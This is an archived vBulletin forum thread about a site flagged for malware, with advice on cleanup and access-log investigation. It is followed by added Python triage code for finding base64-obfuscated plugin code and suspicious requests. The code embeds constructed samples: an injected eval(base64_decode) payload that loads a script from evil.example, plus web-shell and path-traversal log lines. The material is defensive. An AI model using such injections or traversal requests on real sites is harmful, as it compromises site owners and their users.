vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
  #1  
11-11-2010, 03:00 PM
Cutsizzle
Join Date: Apr 2010
Posts: 39
Has thanked others: 0 times
Has been thanked: 0 times in 0 posts
Malware Issue - Urgent Help

I am having users say they are getting a malware warning when going to my site.

Can somebody find the root of the problem please?

www.chicitysports.com
www.chicitysports.com/forum

Thank you to whoever can help!
  #2  
11-11-2010, 05:20 PM
Lynne
Join Date: Sep 2004
Location: California/Idaho
Posts: 41,180
Has thanked others: 0 times
Has been thanked: 0 times in 0 posts

Quote:
What happened when Google visited this site?
Of the 29 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-11-10, and the last time suspicious content was found on this site was on 2010-11-10. This site was hosted on 1 network(s) including AS32475 (SINGLEHOP).
Your site has no CSS. Looking in the page source, it calls this:
http://www.chicitysports.com/wp-content/plugins/digg-digg/include/../css/diggdigg-style.css?ver=4.5.0.2

So, you've got some issues. I'd suggest using a totally default style and turning off your mods and seeing if that fixes the issue.
  #3  
11-22-2010, 06:49 PM
CarlitoBrigante
Join Date: Nov 2002
Location: Iceland
Posts: 182
Has thanked others: 0 times
Has been thanked: 0 times in 0 posts

In these cases, the problem is NEVER, NEVER, NEVER cleaning up the infection. Usually the infection is either in a template or a plugin, hidden using some basic encoding like base64 to make it more difficult to be detected. Easy to clean.

The true problem is finding out HOW you were infected. This can take hours of going through your logs, and in some cases where logs are rotated very often or where you have a lot of traffic, it can take days of research to figure out what happened. In the past, investigating hack attempts, I even found security holes in scripts that most people considered perfectly safe. To do the same, you need to do some search across your access_log (and error_log) and aim at finding possible weird or unusual vBulletin calls. Try googling for access_log analysis and you might find some tips on how to get started.

In many cases, in my experience, the point of entry is simply a shared server environment, especially if the host is of dubious reputation. In these cases, the system is not set up to use the proper security policy and users are able to gain access to your database, for example, or to world-writable directories in your website.

Regardless of their point of entry, these hackers (or script kids) then inject some code - often PHP scripts - into directories or vBulletin plugins, and then run the code to install whatever they want in your templates.

This can be used to spy on your users' passwords, or sometimes just to show ad popups that link back to the hackers' accounts (in this case, it is easy to figure out who the attacker is and contact your local authorities, if the infraction is serious or caused major service disruption).

Lynne gave you good tips, BUT if the code has been injected into your plugins, or if the security hole allowing people to enter is in some modification and nobody has yet noticed or reported it, her tips will not be enough to get rid of the infection. Of course, if you do not have a fully upgraded setup - vBulletin and ALL modifications - then you might be running code with already known security holes.

--------------- Added 11-22-2010, 10:20 PM ---------------

On a note, after the always needed software upgrades, mod_security is by FAR the best tool to prevent these hacks even if you have vulnerable software installed. Some providers even create custom rules that are updated as soon as an exploit in a popular software (or one that you report) is found out, and your mod_security is automatically updated.

This might sound like advertising, but I have no affiliation with them - the guys at AtomiCorp.com offer a package which includes mod_security rules customized and updated as soon as a new exploit is found out in software like Wordpress or vBulletin. The only problem I had with their packages is that if you have an admincp located in a custom directory (which is often recommended), you might see some slowdown in the admincp area, caused by the fact that their mod_security rules are optimized only for standard vBulletin installs. And I think their stuff is optimized for Plesk, not sure if it would work on cPanel.
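The two steps the post above describes, finding code hidden with base64 in a plugin or template and combing access_log for unusual requests, as an added example that is not part of the original thread or of vBulletin itself. It assumes the eval(base64_decode(...)) hiding pattern the post mentions and Apache "combined" format logs. The plugin snippet, the log lines, the evil.example host and the 203.0.113.x / 198.51.100.x / 192.0.2.x addresses are constructed for the example; the list of writable directories and the query-string indicator patterns are starting points chosen here, not an exhaustive rule set.

```python
"""Triage helpers for a compromised vBulletin/WordPress host.

Added example, not code from the thread. Assumptions: injected code uses the
eval(base64_decode(...)) pattern the post describes, and access logs are in the
Apache 'combined' format. All sample inputs below are constructed.
"""
import base64
import binascii
import re
import zlib
from urllib.parse import unquote_plus

# ---- 1. Hidden code in templates / plugin PHP (first paragraph of the post) ----

# Call chains commonly used to hide PHP payloads; case-insensitive, whitespace-tolerant.
OBFUSCATION_RE = re.compile(
    r"(eval|assert|gzinflate|gzuncompress|str_rot13)\s*\(\s*base64_decode\s*\(", re.I)
# Any 60+ character run of the base64 alphabet is worth decoding and reading.
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")


def decode_blob(blob: str) -> str:
    """Base64-decode a blob, then try raw DEFLATE (PHP gzinflate) on the result."""
    b = blob.rstrip("=")
    try:
        raw = base64.b64decode(b + "=" * (-len(b) % 4), validate=True)
    except (binascii.Error, ValueError):
        return ""  # not valid base64 after all
    try:
        raw = zlib.decompress(raw, -15)  # -15 = raw DEFLATE stream, no zlib header
    except zlib.error:
        pass  # plain base64, keep the decoded bytes as they are
    return raw.decode("utf-8", errors="replace")


def find_hidden_code(source: str) -> list:
    """One finding per obfuscated call chain or long base64 blob in `source`."""
    findings = [{"kind": "obfuscated_call", "offset": m.start(), "match": m.group(0)}
                for m in OBFUSCATION_RE.finditer(source)]
    findings += [{"kind": "base64_blob", "offset": m.start(), "decoded": decode_blob(m.group(0))}
                 for m in B64_BLOB_RE.finditer(source)]
    return findings


# Constructed sample: a plugin body after injection, and a clean one for comparison.
PAYLOAD = b"echo '<script src=\"http://evil.example/m.js\"></script>';"
INJECTED_PLUGIN = "<?php\neval(base64_decode('%s'));\n" % base64.b64encode(PAYLOAD).decode()
CLEAN_PLUGIN = "<?php\n$vbulletin->templatecache['header'] .= '';\n"

# ---- 2. Unusual requests in access_log (second paragraph of the post) ----

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')
# Directories vBulletin 3 / WordPress need writable (assumed list); a .php served
# from one of them is almost always an uploaded web shell.
WRITABLE_DIRS = ("/images/", "/customavatars/", "/customprofilepics/",
                 "/signaturepics/", "/attachments/", "/wp-content/uploads/")
# Attack patterns that matter in the query string, the part the script actually sees.
QUERY_INDICATORS = re.compile(
    r"\.\./|php://|base64_|eval\(|union\s+select|<script|=\s*https?://", re.I)


def triage_access_log(lines):
    """Return the requests worth a closer look, each with the reasons it was flagged."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        query = unquote_plus(query)  # %2F-encoded traversal must be decoded before matching
        reasons = []
        if path.endswith(".php") and any(d in path for d in WRITABLE_DIRS):
            reasons.append("PHP executed from an upload/static directory")
        if QUERY_INDICATORS.search(query):
            reasons.append("attack pattern in query string")
        if reasons:
            hits.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                         "path": path, "status": m["status"], "reasons": reasons})
    return hits


# Constructed sample log (RFC 5737 addresses). The digg-digg line reuses the CSS
# path quoted earlier in the thread: its '..' is in the path, which Apache
# normalises before the request reaches PHP, so it is not flagged; traversal in
# a query string is. gallery.php stands for a hypothetical third-party mod.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Nov/2010:02:14:33 +0000] "GET /forum/showthread.php?t=1234 HTTP/1.1" 200 51234 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Nov/2010:02:14:35 +0000] "GET /forum/images/misc/x.php?cmd=ls HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Nov/2010:02:16:01 +0000] "GET /forum/mods/gallery.php?file=..%2F..%2F..%2Fincludes%2Fconfig.php HTTP/1.1" 200 4821 "-" "-"',
    '198.51.100.9 - - [10/Nov/2010:02:16:09 +0000] "POST /forum/customavatars/shell.php HTTP/1.1" 200 128 "-" "libwww-perl/5.8"',
    '192.0.2.4 - - [10/Nov/2010:02:20:00 +0000] "GET /wp-content/plugins/digg-digg/include/../css/diggdigg-style.css?ver=4.5.0.2 HTTP/1.1" 200 2200 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in find_hidden_code(INJECTED_PLUGIN):
        print(f)
    for h in triage_access_log(SAMPLE_LOG):
        print(h["ip"], h["ts"], h["method"], h["path"], h["reasons"])
```

Run it with python3 against the constructed input, or feed `find_hidden_code` the contents of each plugin row exported from the vBulletin plugin table and each template, and `triage_access_log` the real access_log lines. Two caveats: the blob rule also fires on long hashes and minified JavaScript, so read the decoded text rather than treating every hit as proof of infection; and, as the post says, the first flagged request for an IP is often the follow-up (the shell being used), so walk that IP's earlier requests backwards to find how the file got there.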